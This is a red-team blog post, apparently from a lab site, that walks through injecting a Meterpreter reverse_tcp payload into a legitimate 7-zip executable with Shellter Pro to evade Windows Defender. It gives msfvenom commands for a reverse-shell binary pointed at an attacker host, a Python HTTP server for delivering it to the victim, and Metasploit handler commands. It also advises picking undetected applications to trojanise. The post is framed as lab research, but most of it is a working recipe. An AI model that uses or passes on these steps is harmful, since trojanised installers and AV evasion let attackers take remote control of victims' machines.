DMZERO LABS

Showcasing Red & Blue team operations to help protect organisations against sophisticated attacks

View on GitHub

Home. About the project.

Using Shellter Pro for dynamic shellcode injection

We are going to use shellter pro’s auto-mode to inject a listed payload “windows/meterpreter/reverse_tcp” in-to a alpha version of 7-zip. The file that we are going to use has to be 32/bit since there is no support for 64/bit applications at the time of writing. One thing you need to note about using this tool to infect legitimate PE’s, is that you have to use an application that is not flagged by AV for any reason.

What tends to happen is once multiple users start using the same PE for infection and the files get uploaded to tools like virustotal, the detection rates go up. I suggest that if you are testing this out you find a light-weight application and check to see if there are any detections on the file before proceeding. Some of the other articles I am planning to write will cover more advanced capabilities of the tool, we will go through using multiple payload chaining, custom shellcode and various other options availible within the tool.

Lab setup

  1. Windows 10 Victim - Patched & Running Windows Defender
  2. Kali Linux waiting to recieve shellz
  3. Shellter

Before we start lets run a quick test to see if Defender is actually able to catch our very basic/generic payload. This is something that should be picked up by many AV-vendors, we will also explore how you can take a payload like this and use various techniques to make the payload slip through in later blogs.

First things first, lets generate a generic EXE file with MSFVenom to showcase this:

//msfvenom to generate exe
~/msfvenom -p windows/meterpreter/reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f exe > example.exe

After this, the simplest way to move the file over is by hosting an HTTP server that the victim can download the file from:

//HTTP server setup
~/python -m SimpleHTTPServer 80

Octocat

We also need to setup our listener on our attacker host:

//msfconsole for our session
~/msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost x.x.x.x
set lport 443

And as expected Windows Defender saves the day :)

Octocat

The idea now is to try some of the magic that Shellter has to offer. We are going to use the standard settings that are availible within the tool and see how injecting the same payload gets past Windows Defender.

//Shellter Pro using default configuration
1. Put Shellter in Automatic mode
2. Check online for updates
3. Select PE - 7zip renamed to 1.exe for ease
4. Turn on stealth mode
5 - end Use basic features that ships with the tool

Octocat

Now that we have our malicious file ready for execution let’s see how Windows Defender handles this. We will copy the file over to our victim machine and execute it.

We use the same configuration for our metasploit handler:

//msfconsole for our session
~/msfconsole
use exploit/multi/handler  
set payload windows/meterpreter/reverse_tcp  
set lhost x.x.x.x
set lport 443

Octocat

As we can see from the above, the 7zip application functions as expected, and we recieve a fully interactive meterpreter shell back to the attacker host :)

Thats it for this entry, in some of the future blogs we will look at how some of the more advanced AV’s contest against this type of attack.